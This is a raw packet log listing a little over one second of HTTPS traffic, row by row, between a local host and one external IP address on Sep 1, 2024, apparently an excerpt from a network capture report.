Sep 1, 2024 18:27:59.834347963 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.834371090 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.834743977 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.834772110 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.834810972 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.834815979 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.834835052 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.834862947 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.834955931 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.834995985 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.835041046 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.835088968 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.835442066 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.835470915 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.835488081 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.835493088 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.835510015 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.835526943 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.835860968 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.835890055 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.835905075 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.835911036 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.835932970 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.835948944 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.836270094 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.836302996 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.836313963 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.836317062 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.836330891 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.836340904 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.836359024 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.836361885 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.836386919 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.836977005 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.837009907 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.837014914 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.837018967 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.837038040 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.837044954 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.837080956 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.837085009 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.837122917 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.837559938 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.837595940 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.837608099 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.837610960 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.837637901 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.837655067 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.838114977 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.838152885 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.838160992 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.838164091 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.838184118 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.838192940 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.838196993 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.838213921 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.838218927 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.838258028 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.838263035 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.838299990 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.838996887 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.839030027 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.839047909 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.839051962 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.839061975 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.839077950 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.839087963 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.839099884 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.839102983 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.839113951 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.839129925 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.839147091 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.839149952 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.839169025 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.839896917 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.839943886 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.839948893 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.839987993 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.878146887 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.878329992 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.878447056 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.878447056 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.878463030 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.878499985 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.924626112 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.924709082 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.924778938 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.924895048 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.924926996 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.924932957 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.924943924 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.925151110 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.925198078 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.925203085 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.925235987 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.925415993 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.925467014 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.925792933 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.925828934 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.925842047 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.925846100 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.925858974 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.925873041 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.925896883 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.925900936 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.925937891 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.926229000 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.926276922 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.926450014 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.926477909 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.926491022 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.926496029 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.926517963 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.926791906 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.926824093 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.926837921 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.926841974 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.926867008 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.927300930 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.927336931 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.927350998 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.927355051 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.927381992 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.927778006 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.927817106 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.927820921 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.927825928 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.927851915 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.927859068 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.927886009 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.927891970 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.927896976 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.927926064 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.928607941 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.928642988 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.928651094 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.928654909 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.928673029 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.928687096 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.928705931 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.928709030 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.928714037 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.928740978 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.928751945 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.928755999 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.928781986 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.928800106 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.929496050 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.929529905 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.929552078 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.929555893 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.929563999 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.929574013 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.929594040 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.929596901 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.929608107 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.929975033 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.930018902 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.930022955 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.930061102 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.930068970 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.930111885 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.968574047 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.968628883 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.968728065 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.968774080 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.015611887 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.015645027 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.015675068 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.015695095 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.015710115 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.015860081 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.015860081 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.015896082 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.015945911 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.016216040 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.016247034 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.016272068 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.016277075 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.016288042 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.016697884 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.016750097 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.016755104 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.016798019 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.016868114 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.016921043 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.017224073 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.017251015 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.017277002 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.017281055 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.017294884 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.017720938 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.017751932 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.017771959 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.017777920 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.017803907 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.018064976 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.018109083 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.018112898 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.018146992 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.018151999 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.018156052 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.018177986 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.018199921 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.018204927 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.018229008 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.018246889 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.018367052 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.018399954 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.018416882 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.018420935 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.018448114 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.018460989 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.019016027 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019049883 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019073009 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.019077063 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019085884 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019103050 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.019114971 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019126892 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.019130945 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019145966 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019160032 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.019174099 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.019177914 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019207001 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.019855022 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019892931 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019906998 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.019912004 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019942045 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.019946098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019980907 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.019987106 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.019990921 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.020010948 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.020030975 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.020036936 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.020049095 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.020078897 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.020802021 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.020833969 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.020859957 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.020864964 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.020874023 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.020890951 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.020908117 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.020910978 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.060163975 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.060218096 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.060228109 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.060246944 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.060266018 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.060270071 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.060293913 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.106107950 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.106153965 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.106163025 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.106204033 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.106232882 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.106280088 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.106298923 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.106436014 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.106481075 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.106724977 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.106769085 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.106946945 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.106977940 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.106995106 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.107002020 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.107023001 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.107326031 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.107355118 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.107368946 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.107373953 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.107398033 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.107738972 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.107769966 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.107779980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.107784033 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.107814074 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.108057976 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.108102083 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.108108044 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.108141899 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.108227968 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.108268976 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.108433008 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.108500004 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.108522892 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.108568907 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.108922958 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.108959913 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.108974934 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.108978987 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.108998060 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.109261036 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.109299898 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.109307051 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.109312057 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.109330893 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.109347105 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.109352112 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.109370947 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.109390974 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.109898090 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.109930992 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.109951019 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.109956026 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.109981060 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.109999895 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.110398054 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.110433102 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.110445976 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.110449076 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.110466003 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.110476017 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.110491037 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.110493898 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.110502005 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.110521078 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.110551119 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.110554934 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.110595942 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.111175060 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.111208916 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.111223936 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.111228943 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.111241102 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.111262083 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.111269951 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.111288071 CEST	56171	443	192.168.2.4	84.32.84.144
